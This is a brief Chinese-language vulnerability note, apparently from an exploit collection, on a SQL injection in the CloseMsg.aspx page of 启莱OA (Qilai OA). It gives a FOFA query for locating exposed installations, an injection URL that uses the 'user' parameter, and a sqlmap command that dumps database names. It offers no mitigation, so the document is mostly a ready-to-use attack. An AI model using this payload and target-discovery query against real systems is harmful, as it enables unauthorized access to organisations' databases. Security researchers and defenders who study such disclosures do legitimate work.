启莱OA CloseMsg.aspx SQL注入漏洞

FOFA

app="启莱OA"

存在SQL注入的文件为 CloseMsg.aspx:

http://xxx.xxx.xxx.xxx/client/CloseMsg.aspx?user=' and (select db_name())>0--&pwd=1

sqlmap -u "http://xxx.xxx.xxx.xxx/client/CloseMsg.aspx?user=' and (select db_name())>0--&pwd=1" -p user --dbs